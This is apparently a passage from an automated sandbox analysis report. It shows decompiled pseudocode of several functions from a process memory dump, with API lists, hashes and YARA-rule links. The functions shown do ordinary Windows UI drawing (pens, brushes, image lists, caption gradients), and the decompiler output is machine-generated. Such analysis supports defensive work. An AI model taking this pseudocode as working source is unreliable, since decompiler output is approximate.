						 *(_t207 - 4) =  *(_t207 - 4) | 0xffffffff;
						 *(_t207 - 0x24) = 0x42e34c;
						_t30 = _t207 - 0x24; // 0x42e34c
						_t165 = _t30;
					}
					_t113 = L00401D66(_t165);
					if( *(_t207 - 0x14) == 0) {
						goto L23;
					} else {
						goto L18;
					}
				} else {
					_t199 =  *(_t207 + 8);
					_t113 = ImageList_ReplaceIcon( *(_t199 + 4), 0xffffffff, ??);
					 *(_t207 - 0x14) = 1;
					L18:
					if(L0040214E(_t113) != 0 &&  *0x440cfc != 0) {
						_t116 = L00401307();
						 *(_t207 + 0xc) = _t116;
						if(_t116 == 0) {
							_t142 = GetDesktopWindow();
							_push(_t142);
							L00426372();
							 *(_t207 + 0xc) = _t142;
						}
						_t118 = GetDC( *( *(_t207 + 0xc) + 0x20));
						L00425FD0();
						 *(_t207 - 0x30) =  *(_t207 - 0x30) & 0x00000000;
						 *(_t207 + 8) = _t118;
						 *(_t207 - 0x34) = 0x42e34c;
						 *(_t207 - 0x28) =  *(_t207 - 0x28) & 0x00000000;
						 *(_t207 - 4) = 2;
						 *(_t207 - 0x2c) = 0x42e34c;
						L00401974(_t207 - 0x1c);
						 *(_t207 - 0x1c) = 0x42e34c;
						 *(_t207 - 4) = 4;
						E004010A0();
						L0040227A();
						asm("sbb ecx, ecx");
						 *_t204( *(_t199 + 4),  ~(_t207 - 0x34) &  *(_t207 - 0x30), GetSysColor(0xf), _t207 - 0x34,  *(_t207 + 8), _t199, 0, _t207 - 0x34, _t118);
						E004010A0();
						L004019A6();
						asm("sbb ecx, ecx");
						 *_t204( *(_t199 + 4),  ~(_t207 - 0x2c) &  *(_t207 - 0x28), GetSysColor(0xf), _t207 - 0x2c,  *(_t207 + 8), _t199, 0, _t207 - 0x2c);
						_t85 = _t207 - 0x1c; // 0x42e34c
						E004010A0();
						_t88 = _t207 - 0x1c; // 0x42e34c
						L00401221(_t217);
						_t137 = GetSysColor(0xf);
						_t89 = _t207 - 0x1c; // 0x42e34c
						asm("sbb ecx, ecx");
						 *_t204( *(_t199 + 4),  ~_t89 &  *(_t207 - 0x18), _t137, _t88, 0,  *(_t207 + 8), _t199, 0, _t85);
						ReleaseDC( *( *(_t207 + 0xc) + 0x20),  *( *(_t207 + 8) + 4));
						 *(_t207 - 0x1c) = 0x42c514;
						 *(_t207 - 4) = 5;
						L00425FA6();
						 *(_t207 - 0x2c) = 0x42c514;
						 *(_t207 - 0x1c) = 0x42c4fc;
						 *(_t207 - 4) = 6;
						L00425FA6();
						 *(_t207 - 0x2c) = 0x42c4fc;
						 *(_t207 - 0x34) = 0x42c514;
						 *(_t207 - 4) = 7;
						L00425FA6();
					}
					L23:
					 *[fs:0x0] =  *((intOrPtr*)(_t207 - 0xc));
					return  *(_t207 - 0x14);
				}
			}

APIs

_EH_prolog.MSVCRT ref: 004172E6
ImageList_ReplaceIcon.COMCTL32(?,000000FF), ref: 00417317
#1641.MFC42(?), ref: 0041734F
ImageList_AddMasked.COMCTL32(00000000,?,00000000), ref: 00417381
#2452.MFC42 ref: 00417391
DeleteObject.GDI32(?), ref: 00417399
GetDesktopWindow.USER32 ref: 0041746D
#2864.MFC42(00000000), ref: 00417474
GetDC.USER32(?), ref: 00417482
#2859.MFC42(00000000), ref: 00417489
GetSysColor.USER32(0000000F), ref: 004174DE
ImageList_AddMasked.COMCTL32(00000004,00000000,00000000), ref: 004174EF
GetSysColor.USER32(0000000F), ref: 00417511
ImageList_AddMasked.COMCTL32(00000004,00000000,00000000), ref: 00417522

Part of subcall function 004010A0: _EH_prolog.MSVCRT ref: 004142B4
Part of subcall function 004010A0: ImageList_GetIcon.COMCTL32(?,?,00000000), ref: 004142CB
Part of subcall function 004010A0: #323.MFC42 ref: 004142D6
Part of subcall function 004010A0: CreateCompatibleDC.GDI32(?), ref: 004142ED
Part of subcall function 004010A0: #1640.MFC42(00000000), ref: 004142F7
Part of subcall function 004010A0: CreateCompatibleBitmap.GDI32(?,00000010,0000000F), ref: 0041430C
Part of subcall function 004010A0: #1641.MFC42(00000000), ref: 00414318
Part of subcall function 004010A0: #5785.MFC42(?,?,00000000), ref: 0041432C
Part of subcall function 004010A0: GetSysColor.USER32(0000000F), ref: 00414343
Part of subcall function 004010A0: CreateSolidBrush.GDI32(00000000), ref: 0041434A
Part of subcall function 004010A0: #1641.MFC42(00000000), ref: 00414354
Part of subcall function 004010A0: DrawIconEx.USER32 ref: 00414381
Part of subcall function 004010A0: #5785.MFC42(?,00000000), ref: 00414392
Part of subcall function 004010A0: #2405.MFC42(?,00000000), ref: 0041439A
Part of subcall function 004010A0: DestroyIcon.USER32(00000000,?,00000000), ref: 004143A0
Part of subcall function 004010A0: #2414.MFC42 ref: 004143B4
Part of subcall function 004010A0: #640.MFC42 ref: 004143C7

GetSysColor.USER32(0000000F), ref: 00417546
ImageList_AddMasked.COMCTL32(00000004,?,00000000), ref: 00417557
ReleaseDC.USER32 ref: 00417565
#2414.MFC42 ref: 0041757A
#2414.MFC42 ref: 00417591
#2414.MFC42 ref: 004175A6

Strings

LB, xrefs: 00417527, 0041752A
LB, xrefs: 00417495
LB, xrefs: 0041734C

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ImageList_$#2414ColorIconMasked$#1641Create$#5785CompatibleH_prolog$#1640#2405#2452#2859#2864#323#640BitmapBrushDeleteDesktopDestroyDrawObjectReleaseReplaceSolidWindow
String ID: LB$LB$LB
API String ID: 2600138966-4268681488
Opcode ID: 67f17533da43afd22053e08bf6c49b81e5448f4de1d6f2e846256b55ef1b71db
Instruction ID: 0af4a32cfe689e4cc7093bccbadc56166731d38a7fedd67902ec76a284e1d529
Opcode Fuzzy Hash: 67f17533da43afd22053e08bf6c49b81e5448f4de1d6f2e846256b55ef1b71db
Instruction Fuzzy Hash: 3191387190011AABDF04DFE5D945BEEBBB4FF08304F10812AE915B71A1DB78AA45CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00421672, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00421672(intOrPtr* __ecx, char _a8) {
				char _v0;
				intOrPtr* _v4;
				char _v5;
				intOrPtr _v120;
				intOrPtr* _t94;
				intOrPtr* _t96;
				char* _t97;
				intOrPtr* _t101;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_t101 = __ecx;
				_v4 = __ecx;
				L004260F6();
				_a8 = 0;
				L00401974(__ecx + 0x40);
				_v0 = 0x42e55c;
				_t94 = __ecx + 0x48;
				_a8 = 1;
				L00401974(_t94);
				 *_t94 = 0x42e55c;
				_a8 = 2;
				L00401974(__ecx + 0x50);
				 *((intOrPtr*)(__ecx + 0x50)) = 0x42e544;
				_a8 = 3;
				L00401974(__ecx + 0x58);
				 *((intOrPtr*)(__ecx + 0x58)) = 0x42e544;
				_a8 = 4;
				L00401974(__ecx + 0x60);
				 *((intOrPtr*)(__ecx + 0x60)) = 0x42e544;
				_a8 = 5;
				L00401974(__ecx + 0x68);
				 *((intOrPtr*)(__ecx + 0x68)) = 0x42e544;
				_a8 = 6;
				L00401974(__ecx + 0x70);
				 *((intOrPtr*)(__ecx + 0x70)) = 0x42e544;
				_a8 = 7;
				L00401974(__ecx + 0x78);
				 *((intOrPtr*)(__ecx + 0x78)) = 0x42e544;
				_t96 = __ecx + 0x80;
				_a8 = 8;
				L00401974(_t96);
				 *_t96 = 0x42dce0;
				_t97 = __ecx + 0x90;
				_a8 = 9;
				 *_t97 = _v5;
				 *((intOrPtr*)(_t97 + 4)) = L00401ED8(0, 0);
				 *((intOrPtr*)(_t97 + 8)) = 0;
				_v0 = 0xa;
				 *_t101 = 0x42f394;
				 *((intOrPtr*)(_t101 + 0x88)) = 0;
				 *((intOrPtr*)(_t101 + 0x8c)) = 0;
				 *(_t101 + 0x9c) = 1;
				_push(CreateSolidBrush(0));
				L004264BC();
				_push(CreateSolidBrush(GetSysColor(0xf)));
				L004264BC();
				_push(CreatePen(0, 1, 0));
				L004264BC();
				_push(CreatePen(0, 1, GetSysColor(0xf)));
				L004264BC();
				_push(CreatePen(0, 1, GetSysColor(0x14)));
				L004264BC();
				_push(CreatePen(0, 2, GetSysColor(0x14)));
				L004264BC();
				_push(CreatePen(0, 1, GetSysColor(0x10)));
				L004264BC();
				_push(CreatePen(0, 2, GetSysColor(0x10)));
				L004264BC();
				 *[fs:0x0] = _v120;
				return _t101;
			}

APIs

_EH_prolog.MSVCRT ref: 00421677
#567.MFC42 ref: 00421688
CreateSolidBrush.GDI32 ref: 00421778
#1641.MFC42(00000000), ref: 00421781
GetSysColor.USER32(0000000F), ref: 0042178E
CreateSolidBrush.GDI32(00000000), ref: 00421791
#1641.MFC42(00000000), ref: 0042179B
CreatePen.GDI32(00000000,00000001,00000000), ref: 004217AA
#1641.MFC42(00000000), ref: 004217B0
GetSysColor.USER32(0000000F), ref: 004217B7
CreatePen.GDI32(00000000,00000001,00000000), ref: 004217BD
#1641.MFC42(00000000), ref: 004217C3
GetSysColor.USER32(00000014), ref: 004217CA
CreatePen.GDI32(00000000,00000001,00000000), ref: 004217D0
#1641.MFC42(00000000), ref: 004217D6
GetSysColor.USER32(00000014), ref: 004217DD
CreatePen.GDI32(00000000,00000002,00000000), ref: 004217E3
#1641.MFC42(00000000), ref: 004217E9
GetSysColor.USER32(00000010), ref: 004217F0
CreatePen.GDI32(00000000,00000001,00000000), ref: 004217F6
#1641.MFC42(00000000), ref: 004217FC
GetSysColor.USER32(00000010), ref: 00421803
CreatePen.GDI32(00000000,00000002,00000000), ref: 00421809
#1641.MFC42(00000000), ref: 0042180F

Strings

DB, xrefs: 004216C6

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1641Create$Color$BrushSolid$#567H_prolog
String ID: DB
API String ID: 3263936817-3807777182
Opcode ID: 21ec17adb9471a19fe1029f77abc448ed9d4f8103b3afa69715bf22493127f45
Instruction ID: 91a8f59daaee8f57e2583ff205db0dc78c61f86808e6120e875122475f7e5164
Opcode Fuzzy Hash: 21ec17adb9471a19fe1029f77abc448ed9d4f8103b3afa69715bf22493127f45
Instruction Fuzzy Hash: 9D5194B05007849FD310EB36DC45BABBBD8BF85308F410A1EF5C657292DBB8A544CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00401087, Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 334
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00401087(intOrPtr __ecx) {
				void* _t143;
				int _t144;
				intOrPtr _t150;
				signed char _t151;
				intOrPtr _t165;
				int _t170;
				long _t171;
				int* _t179;
				intOrPtr _t194;
				intOrPtr _t199;
				signed char _t201;
				CHAR* _t209;
				intOrPtr _t215;
				signed int _t221;
				int _t222;
				signed int _t230;
				intOrPtr _t233;
				int _t247;
				signed int _t259;
				struct tagRECT _t265;
				intOrPtr _t267;
				int _t268;
				intOrPtr _t271;
				int _t286;
				signed int _t287;
				signed int _t289;
				intOrPtr _t292;
				intOrPtr _t294;
				intOrPtr _t295;
				intOrPtr _t298;
				signed int _t300;
				signed int _t303;
				signed int _t304;
				signed int _t309;
				void* _t312;

				L004269E6();
				_t199 = __ecx;
				 *((intOrPtr*)(_t312 - 0x50)) = __ecx;
				_t143 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0x114))();
				if(_t143 != 0) {
					_t144 = L004020E0(__ecx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t267 =  *((intOrPtr*)(__ecx + 0xf8));
					 *(_t312 - 0x40) = _t144;
					asm("movsd");
					_t298 =  *((intOrPtr*)(__ecx + 0xfc));
					_t286 = 0;
					if(_t144 == 0) {
						_t215 =  *((intOrPtr*)(_t312 + 0x10)) -  *((intOrPtr*)(__ecx + 0xec)) - 1;
						 *((intOrPtr*)(_t312 - 0x18)) = _t215;
						_t268 = _t267 + 0xfffffffd;
						__eflags = _t268;
						 *((intOrPtr*)(_t312 - 0x10)) = _t215 + 0xb;
						 *(_t312 - 0x14) = _t268;
					} else {
						_t265 =  *((intOrPtr*)(_t312 + 0xc)) -  *((intOrPtr*)(__ecx + 0xec)) - 1;
						 *(_t312 - 0x1c) = _t265;
						 *(_t312 - 0x14) = _t265 + 0xb;
						 *((intOrPtr*)(_t312 - 0x18)) = _t298 + 0xe;
					}
					InflateRect(_t312 - 0x1c, 0 | _t144 != _t286, 0 | _t144 == _t286);
					if( *((intOrPtr*)(_t199 + 0x100)) == _t286) {
						_t201 = GetSysColor(3);
					} else {
						_t201 = GetSysColor(2);
					}
					 *(_t312 - 0x54) = _t286;
					SystemParametersInfoA(0x1008, _t286, _t312 - 0x54, _t286);
					if( *(_t312 - 0x54) != _t286) {
						_t150 =  *((intOrPtr*)(_t312 - 0x50));
						__eflags =  *((intOrPtr*)(_t150 + 0x100)) - _t286;
						if( *((intOrPtr*)(_t150 + 0x100)) == _t286) {
							_push(0x1c);
						} else {
							_push(0x1b);
						}
						_t151 = GetSysColor();
						 *(_t312 + 0x18) = _t286;
						_t221 = _t201 & 0x000000ff;
						_t287 = _t201 >> 0x00000010 & 0x000000ff;
						 *(_t312 - 0x44) = _t151 >> 0x00000010 & 0x000000ff;
						 *(_t312 - 0x5c) = _t151 & 0x000000ff;
						_t300 = _t201 & 0x000000ff;
						 *(_t312 - 0x3c) =  ~_t287;
						 *(_t312 - 0x30) =  ~_t300;
						_t271 = 0;
						 *(_t312 - 0x38) = _t287 << 6;
						_t289 = _t300 << 6;
						 *(_t312 - 0x60) = _t151 & 0x000000ff;
						_t209 =  *(_t312 + 8);
						 *((intOrPtr*)(_t312 - 0x2c)) = 0;
						_t222 = _t221 << 6;
						__eflags = _t222;
						 *((intOrPtr*)(_t312 - 0x28)) = 0;
						 *((intOrPtr*)(_t312 - 0x58)) = 0;
						 *(_t312 - 0x64) =  ~_t221;
						 *(_t312 - 0x4c) = _t289;
						 *(_t312 - 0x48) = _t222;
						do {
							 *(_t312 + 8) =  *((intOrPtr*)(_t312 - 0x28)) + _t289 >> 6;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							__eflags =  *(_t312 - 0x40);
							 *(_t312 + 8) = 0 << 0x00000008 | _t222 + _t271 >> 0x00000006 & 0x000000ff;
							asm("movsd");
							if( *(_t312 - 0x40) == 0) {
								_t303 =  *(_t312 + 0x18);
								_t230 =  *(_t312 - 0x14) -  *(_t312 - 0x1c);
								_t165 = (_t230 * _t303 >> 6) +  *(_t312 - 0x1c);
								_t304 = _t303 + 1;
								_t233 = (_t230 * _t304 >> 6) +  *(_t312 - 0x1c);
								 *((intOrPtr*)(_t312 - 0x74)) = _t165;
								 *((intOrPtr*)(_t312 - 0x6c)) = _t233;
								__eflags = _t233 - _t165;
							} else {
								_t294 =  *((intOrPtr*)(_t312 - 0x10));
								_t309 =  *(_t312 + 0x18);
								_t259 = _t294 -  *((intOrPtr*)(_t312 - 0x18));
								_t194 = _t294 - (_t259 * _t309 >> 6);
								_t304 = _t309 + 1;
								_t295 = _t294 - (_t259 * _t304 >> 6);
								 *((intOrPtr*)(_t312 - 0x68)) = _t194;
								 *((intOrPtr*)(_t312 - 0x70)) = _t295;
								__eflags = _t194 - _t295;
							}
							if(__eflags > 0) {
								_push( *(_t312 + 8));
								_push(_t312 - 0x74);
								L004264C8();
							}
							 *((intOrPtr*)(_t312 - 0x28)) =  *((intOrPtr*)(_t312 - 0x28)) +  *(_t312 - 0x60);
							 *(_t312 - 0x38) =  *(_t312 - 0x38) +  *(_t312 - 0x3c);
							_t271 =  *((intOrPtr*)(_t312 - 0x58)) +  *(_t312 - 0x5c);
							_t222 =  *(_t312 - 0x48) +  *(_t312 - 0x64);
							_t289 =  *(_t312 - 0x4c) +  *(_t312 - 0x30);
							 *((intOrPtr*)(_t312 - 0x2c)) =  *((intOrPtr*)(_t312 - 0x2c)) +  *(_t312 - 0x44);
							__eflags = _t304 - 0x40;
							 *(_t312 + 0x18) = _t304;
							 *((intOrPtr*)(_t312 - 0x58)) = _t271;
							 *(_t312 - 0x48) = _t222;
							 *(_t312 - 0x4c) = _t289;
						} while (_t304 < 0x40);
						_t286 = 0;
						__eflags = 0;
					} else {
						_push(_t201);
						_t209 =  *(_t312 + 8);
						_push(_t312 - 0x1c);
						L004264C8();
					}
					 *(_t312 - 0x20) = _t286;
					 *((intOrPtr*)(_t312 - 0x24)) = 0x42dce0;
					 *(_t312 - 4) = _t286;
					_t170 = MulDiv(0x55, 0x60, GetDeviceCaps(_t209[8], 0x58));
					_t292 =  *((intOrPtr*)(_t312 - 0x50));
					_push(0);
					_push( *((intOrPtr*)(_t292 + 0x104)));
					_push(_t170);
					L004264C2();
					if(_t170 != 0) {
						if( *((intOrPtr*)(_t292 + 0x100)) == 0) {
							_push(0x13);
						} else {
							_push(9);
						}
						_t171 = GetSysColor();
						L00425FBE();
						 *(_t312 - 0x44) = _t171;
						 *(_t312 - 0x3c) =  *((intOrPtr*)( *_t209 + 0x38))(_t171, 1);
						if( *(_t312 - 0x40) != 0) {
							GetObjectA( *(_t312 - 0x20), 0x3c, _t312 - 0xb0);
							L00425FA6();
							 *((intOrPtr*)(_t312 - 0xa8)) = 0x384;
							_push(CreateFontIndirectA(_t312 - 0xb0));
							L004264BC();
						}
						 *(_t312 + 0x18) =  *((intOrPtr*)( *_t209 + 0x30))(_t312 - 0x24);
						L00425E08();
						_push(_t312 + 8);
						 *(_t312 - 4) = 1;
						L00426246();
						if( *(_t312 - 0x40) == 0) {
							_t247 =  *(_t312 - 0x1c) + 3;
							__eflags = _t247;
							 *(_t312 - 0x30) =  *((intOrPtr*)(_t312 - 0x18)) - 1;
							 *(_t312 - 0x34) = _t247;
							_t179 = _t312 - 0x34;
						} else {
							 *(_t312 - 0x30) =  *((intOrPtr*)(_t312 - 0x10)) + 0xfffffffd;
							 *(_t312 - 0x34) =  *(_t312 - 0x1c) - 1;
							_t179 = _t312 - 0x34;
						}
						ExtTextOutA(_t209[4],  *_t179, _t179[1], 4, _t312 - 0x1c,  *(_t312 + 8),  *( *(_t312 + 8) - 8), 0);
						 *((intOrPtr*)( *_t209 + 0x30))( *(_t312 + 0x18));
						L00425FBE();
						 *((intOrPtr*)( *_t209 + 0x38))( *(_t312 - 0x3c),  *(_t312 - 0x44));
						 *(_t312 - 4) =  *(_t312 - 4) & 0x00000000;
						L00425DFC();
					}
					_push(_t209);
					_t143 = L00401DFC(_t292 + 0xf0);
					 *((intOrPtr*)(_t312 - 0x24)) = 0x42c514;
					 *(_t312 - 4) = 2;
					L00425FA6();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t312 - 0xc));
				return _t143;
			}

APIs

_EH_prolog.MSVCRT ref: 0040F008
InflateRect.USER32(?,00000000,00000000), ref: 0040F099
GetSysColor.USER32(00000002), ref: 0040F0AF
GetSysColor.USER32(00000003), ref: 0040F0B7
SystemParametersInfoA.USER32(00001008,00000000,?,00000000), ref: 0040F0D3
#2754.MFC42(?,00000000), ref: 0040F0E8
GetSysColor.USER32(0000001C), ref: 0040F103
#2754.MFC42(?,?), ref: 0040F207
GetDeviceCaps.GDI32(?,00000058), ref: 0040F25F
MulDiv.KERNEL32(00000055,00000060,00000000), ref: 0040F26A
#2243.MFC42(00000000,?,00000000), ref: 0040F280
GetSysColor.USER32(00000013), ref: 0040F29C
#5875.MFC42(00000001), ref: 0040F2A4
GetObjectA.GDI32(?,0000003C,?), ref: 0040F2C9
#2414.MFC42 ref: 0040F2D2
CreateFontIndirectA.GDI32(?), ref: 0040F2E8
#1641.MFC42(00000000), ref: 0040F2F2
#540.MFC42 ref: 0040F308
#3874.MFC42(?), ref: 0040F317
ExtTextOutA.GDI32(00000001,?,?,00000004,?,?,?,00000000), ref: 0040F364
#5875.MFC42(?), ref: 0040F379
#800.MFC42 ref: 0040F38F
#2414.MFC42(?,00000000,?,00000000), ref: 0040F3B1

Strings

cbw, xrefs: 0040F25F

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$#2414#2754#5875$#1641#2243#3874#540#800CapsCreateDeviceFontH_prologIndirectInflateInfoObjectParametersRectSystemText
String ID: cbw
API String ID: 1887894383-4167342517
Opcode ID: b2add50e8b4f45ccbb4bfa1cc3b9249e4d459584d21c90db2a546ab98819a46c
Instruction ID: 4b563bd0a791b9b6d2ae0b1799790c48993804ae7dd53716822bd4958d1cb052
Opcode Fuzzy Hash: b2add50e8b4f45ccbb4bfa1cc3b9249e4d459584d21c90db2a546ab98819a46c
Instruction Fuzzy Hash: 40D15C71E00219DFCB18DFA9D895AEEBBB5BF48300F14813EE806AB391D7746A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004163C6, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004163C6() {
				intOrPtr _t55;
				intOrPtr _t58;
				long _t62;
				void* _t80;
				intOrPtr _t112;
				void* _t113;
				intOrPtr _t118;
				void* _t119;
				void* _t121;

				L004269E6();
				 *((intOrPtr*)(_t121 - 0x10)) = 0;
				 *((intOrPtr*)(_t121 - 0x18)) = 0;
				 *((intOrPtr*)(_t121 - 0x1c)) = 0x42e544;
				 *((intOrPtr*)(_t121 - 4)) = 0;
				_push(CreatePen(0, 0,  *(_t121 + 0x14)));
				L004264BC();
				_t8 = _t121 - 0x1c; // 0x42e544
				_t55 = _t8;
				_push(_t55);
				L00426636();
				 *((intOrPtr*)(_t121 - 0x14)) = _t55;
				if( *((intOrPtr*)(_t121 + 0x18)) != 0) {
					 *((intOrPtr*)(_t121 - 0x10)) = 1;
				}
				_t112 =  *((intOrPtr*)(_t121 + 0x10));
				_t118 =  *((intOrPtr*)(_t121 + 0xc));
				_push(_t112 + 2);
				_push(_t118);
				_push(_t121 - 0x24);
				L004266F0();
				_t113 = _t112 -  *((intOrPtr*)(_t121 - 0x10));
				_t58 = _t113 + 5;
				_push(_t58);
				_push(_t118);
				 *((intOrPtr*)(_t121 + 8)) = _t58;
				L004266EA();
				_push( *((intOrPtr*)(_t121 + 0x10)) + 3);
				_push(_t118 + 1);
				_push(_t121 - 0x24);
				L004266F0();
				_t62 = _t113 + 6;
				 *(_t121 + 0x14) = _t62;
				_push(_t62);
				_push(_t118 + 1);
				L004266EA();
				_push( *((intOrPtr*)(_t121 + 0x10)) + 4);
				_push(_t118 + 2);
				_push(_t121 - 0x24);
				L004266F0();
				_push(_t113 + 7);
				_push(_t118 + 2);
				L004266EA();
				_push( *((intOrPtr*)(_t121 + 0x10)) + 3);
				_push(_t118 + 3);
				_push(_t121 - 0x24);
				L004266F0();
				_push( *(_t121 + 0x14));
				_push(_t118 + 3);
				L004266EA();
				_push( *((intOrPtr*)(_t121 + 0x10)) + 2);
				_push(_t118 + 4);
				_push(_t121 - 0x24);
				L004266F0();
				_push( *((intOrPtr*)(_t121 + 8)));
				_push(_t118 + 4);
				L004266EA();
				_push( *((intOrPtr*)(_t121 + 0x10)) + 1);
				_push(_t118 + 5);
				_push(_t121 - 0x24);
				L004266F0();
				_push(_t113 + 4);
				_push(_t118 + 5);
				L004266EA();
				_push( *((intOrPtr*)(_t121 + 0x10)));
				_t119 = _t118 + 6;
				_t80 = _t121 - 0x24;
				_push(_t119);
				_push(_t80);
				L004266F0();
				_push(_t113 + 3);
				_push(_t119);
				L004266EA();
				_push( *((intOrPtr*)(_t121 - 0x14)));
				L00426636();
				L00425FA6();
				 *((intOrPtr*)(_t121 - 0x1c)) = 0x42c514;
				 *((intOrPtr*)(_t121 - 4)) = 1;
				L00425FA6();
				 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0xc));
				return _t80;
			}

APIs

_EH_prolog.MSVCRT ref: 004163CB
CreatePen.GDI32(00000000,00000000,?), ref: 004163ED
#1641.MFC42(00000000), ref: 004163F7
#5787.MFC42(DB,00000000), ref: 00416405
#4297.MFC42(?,?,?,DB,00000000), ref: 0041642A
#4133.MFC42(?,?,?,?,?,DB,00000000), ref: 0041643C
#4297.MFC42(?,?,?,?,?,?,?,?,DB,00000000), ref: 00416452
#4133.MFC42(?,?,?,?,?,?,?,?,?,?,DB,00000000), ref: 00416464
#4297.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,DB,00000000), ref: 0041647A
#4133.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,DB), ref: 00416489
#4297.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041649F
#4133.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004164AD
#4297.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004164C3
#4133.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004164D1
#4297.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004164E5
#4133.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004164F4
#4297.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416506
#4133.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416512
#5787.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041651C
#2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416524
#2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041653A

Strings

DB, xrefs: 004163F4

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
